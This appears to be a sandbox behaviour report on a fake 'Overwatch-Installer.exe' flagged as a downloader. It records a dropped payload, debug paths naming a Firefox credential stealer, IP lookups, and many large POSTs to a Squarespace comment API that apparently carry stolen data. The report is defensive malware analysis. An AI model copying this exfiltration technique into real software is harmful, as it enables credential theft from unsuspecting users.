Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50154 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50179 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50178 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50177 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50181 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50183 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50204 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50208 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50214 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50224 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50225 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50226 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50227 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50223 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50230 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50231 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50232 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50269 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50270 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50272 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50271 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50279 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50280 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50281 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50282 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50307 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50308 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50310 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50309 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50335 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50336 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50337 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50338 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50339 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50349 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50348 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50356 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50364 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50365 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50367 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50379 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50381 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50380 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50378 version: TLS 1.0

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: Overwatch-Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: Overwatch-Installer.exe, nefgd.exe.0.dr
Source:	Binary string: r\VB.net\stealers\firefoxx64\firefox\obj\Debug\firefox.pdb source: Overwatch-Installer.exe, nefgd.exe.0.dr

Networking

Yara detected Generic Downloader

Source: Yara match	File source: Overwatch-Installer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 198.185.159.177 198.185.159.177
Source: Joe Sandbox View	IP Address: 198.185.159.177 198.185.159.177
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View

ASN Name: SQUARESPACEUS SQUARESPACEUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 320Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 596Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 320Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 596Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 870Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108472Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108898Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108470Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108470Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108470Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116722Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116722Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116720Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108470Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116722Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108472Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108470Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
